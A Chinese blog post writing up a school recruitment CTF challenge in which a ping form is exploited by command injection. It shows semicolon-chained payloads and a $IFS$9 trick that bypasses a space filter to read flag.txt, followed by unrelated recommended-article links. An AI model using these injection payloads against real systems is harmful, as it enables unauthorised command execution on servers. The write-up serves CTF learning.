记一次对学校招新靶场命令执行题目的解决

最新推荐文章于 2024-07-22 19:18:15 发布
最新推荐文章于 2024-07-22 19:18:15 发布
阅读量107 收藏
点赞数 1
分类专栏: 技能大赛 文章标签: 网络安全 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73054601/article/details/127175215
版权

题目页面如下图,ping,很容易让人想起来命令执行漏洞

先用ls 测试一下,成功执行

 在打算跳到根目录时,=127.0.0.1;ls /   发现没有正常显示测试得出对空格进行过滤

使用$IFS$9替换(当然还有其他方式在此不在赘述)

成功跳转,看到flag.txt,使用127.0.0.1;cd$IFS$9/;cat$IFS$9flag.txt

 

 成功读取到内容

飞奔的狸花猫
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一次CTFd平台搭建
weixin_43802844的博客
09-14 4416
CTFd平台搭建指南 前言 学校要承办市赛的网络安全赛项,要求要稳定的平台,所以这一次我选择了CTFd作为本次比赛的环境。(以前内部比赛用过H1v1,偶尔会出现500的报错。)之前看到过赵师傅写的CTFd-Whale动态容器插件,创建独立靶机+快速部署,非常让人心动。所以本次平台搭建就采用了CTFd+CTFd-Whale模式。 赵师傅原文链接:https://www.zhaoj.in/read-6333.html?tdsourcetag=s_pctim_aiomsg 特别感谢:https://www.ta
平台搭建_一次CTFd平台搭建
weixin_39963080的博客
11-25 1042
CTFd环境搭建指南前言学校要承办市赛的网络安全赛项,要求要稳定的平台,所以这一次我选择了CTFd作为本次比赛的环境。(以前内部比赛用过H1v1,偶尔会出现500的报错。)之前看到过赵师傅写的CTFd-Whale动态容器插件,创建独立靶机+快速部署,非常让人心动。所以本次平台搭建就采用了CTFd+CTFd-Whale模式。赵师傅原文链接:https://www.zhaoj.in/read...
CTFd最新动态靶场环境部署笔(2021.08.01更新)
Vicosna的博客
08-04 3541
前言 目前CTFd平台的搭建教程网上有很多,但也有部分写的水,不够详细,跟着那些教程部署完多多少少还是会出现不少问题,从而导致部署失败,既浪费了时间精力不说还多多少少影响了学习的进度,有这个功夫在这多折腾平台,还不如多做两道PWN题目呢~ 由于学校社团内部学习交流的需要,本人在经过两天的折腾学习后,结合各位前辈所写的的教程,终于成功搭建了最新的版本的CTFd,同时使用CTFd-Whale支持动态靶场环境。 本教程基于 Debian 10 + Docker + Docker Compose部署(CentOS
搭建基于docker的CTF动态靶场
m0_63525319的博客
08-17 1316
手把手教你从0开始搭建ctf动态靶场,可以自己放ctf题目
为新手快速入门CTF-Web开发的一款把靶场.zip
01-16
靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战...
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
网络攻防演练靶场解决方案
12-31
解决方案旨在建设一个网络攻防演练靶场,旨在提高信息安全工作人员的专业技能,通过搭建信息安全攻防演练平台,构建多个实验环境,通过现场培训与实操提高信息安全红蓝队漏洞和隐患发现技能,进一步加强信息安全...
靶场新型遥测发射机的研制方案
08-26
总的来说,新型遥测发射机通过采用通用计算机和FPGA技术,实现了更高效的参数管理和系统集成,增强了设备的灵活性和适应性,为靶场测试提供了更为可靠的遥测解决方案。这种创新设计有望推动遥测技术的进步,进一步...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8341
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
PostgreSQL的Json数据类型如何使用
招风的黑耳CSDN
07-18 439
PostgreSQL中的JSON数据类型提供了一种灵活的方式来存储JSON(JavaScript Object Notation)数据。JSON是一种轻量级的数据交换格式,易于人阅读和编写,同时也易于机器解析和生成。在PostgreSQL中,你可以使用JSON和JSONB(JSON的二进制格式,支持索引和更快的查询)数据类型来存储JSON数据。
PostgreSQL异常:An I/O error occurred while sending to the backend
IT后浪的博客
07-19 361
在使用PostgreSQL数据库批量写入数据的时候,遇到了一个问题,异常内容如下:Cause: org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
PostgreSQL的逻辑架构
weixin_41992498的博客
07-18 123
一、PostgreSql的逻辑架构:所有者:
【MySQL】根据binlog日志获取回滚sql的一个开发思路
weixin_45385457的博客
07-19 430
不同客户端之间会交替追加在 binlog 中,需要通过 👆的 binlog 匹配流程来控制匹配。行,需要再次寻找 thread_id 相同的行,匹配到后执行上一个流程。在 binlog 中的线程 ID 录为 thread_id。一个线程执行多个 sql 回滚到同一个文件可能带来的问题。对应 binlog 日志中的 thread_id=指定 mysql 客户端 开始时间和结束时间。打开 mysql 客户端 开始时间。关闭 mysql 客户端 结束时间。先匹配 thread_id 相同的。
怎样在 PostgreSQL 中实现数据的异地备份?
技术笔记
07-19 1127
总而言之,在 PostgreSQL 中实现数据的异地备份不是一件难事,但也需要我们认真对待,精心规划。选择合适的备份方法和异地存储方式,制定合理的备份策略,定期进行测试和恢复演练,才能确保我们的数据在任何情况下都能“安然无恙”。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
sqlalchemy定期保持mysql连接活跃
ithongchou的博客
07-18 4693
数据库时,确保保持活跃连接是很重要的,特别是在长时间不使用数据库连接时。使用连接池管理数据库连接。通过配置合适的连接池参数可以有效地保持活跃连接。,以保持连接的活跃状态。这可以通过任务调度库如。(超出连接池大小时允许创建的额外连接数)和。(连接在被放回连接池前的最大生存时间)等。查询,保持数据库连接的活跃状态。可以定期执行简单的查询,例如。这个例子会每隔一段时间执行
Sqlmap中文使用手册 - Detection模块参数使用
最新发布
Reset
07-22 474
sqlmap是一款自动化检测与利用sql注入漏洞的免费开源工具。
如何查询Oracle数据库一周内每天的SQL执行次数
weixin_60783132的博客
07-18 856
今天引入的问题是:oracle数据库怎么查询一周内,每天的查询次数?数据库的AWR报告会录SQL的执行情况,可以从DBA_HIST_SNAPSHOT、在DBA_HIST_SQLSTAT这两个视图通过快照 id join一下得到录了系统七天内Oracle数据库的SQL执行次数。如果有异常,再去分析问题。如果某一条SQL执行异常,需要做分析,怎么找出这条SQL文本。
在 PostgreSQL 里如何实现数据的分布式事务的事务传播和协调?
技术笔记
07-18 893
在分布式系统中,一个事务可能涉及到多个不同的节点或数据库。分布式事务就是要确保在这些多个操作中,要么所有的操作都成功提交,要么所有的操作都回滚,以保持数据的一致性。打个比方,这就好比一个团队合作完成一个项目,如果其中一个环节出了问题,整个项目都可能受到影响,所以需要确保每个环节都能顺利完成,或者在出现问题时能够及时回滚,避免出现部分完成、部分失败的情况。在本文中,我们深入探讨了在 PostgreSQL 中如何实现数据的分布式事务的事务传播和协调。
xshell启动靶场命令
10-13
要启动Xshell靶场命令,首先需要准备好以下几个步骤。...总结起来,启动Xshell靶场命令的过程需要先安装Xshell软件,然后创建一个新的会话并按照靶场的相关配置填写必要的信息,最后成功登录到靶场中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值